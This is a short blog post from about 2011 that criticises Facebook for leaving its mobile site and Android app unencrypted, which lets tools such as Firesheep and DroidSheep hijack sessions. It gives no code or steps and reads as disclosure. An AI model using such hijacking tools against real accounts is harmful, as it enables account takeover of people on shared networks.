It was October 2010, when Eric Butler introduced “Firesheep” – an easy to use Firefox plug-in for Session hijacking on Windows and Mac. There soon was a big hipe and lots of ethic discussion about that – though the attack itself was neither new nor based on exploits, but only uses data which is shout as a wireless broadcast over the air.
In January 2011, facebook took care of the public pressure and added optional HTTPS support to their web site.
But there is one thing specially mobile users should not forget: The HTTPS setting does not work for m.facebook.com – there is no encryption for the mobile version of the facebook web site.
Another thing is the facebook Android app: Facebook enforces every developer, who wants to use facebook API in his application, to use SSL for any request to facebook (LINK). This is ironic – they do not use encryption for their api themselves!
The official facebook Android app sends it’s cookie and HTTP requests unencrypted to facebook and DroidSheep can simply hijack the requests and the account – even if the user has HTTPS enabled.
So if someone uses mobile website or Android App (I don´t have an iPhone but I can imagine there is no security too in iOS facebook App) there is no way for him to secure his session against hijacking. This is very poor, facebook!
I made a short screencast that shows this lack of security.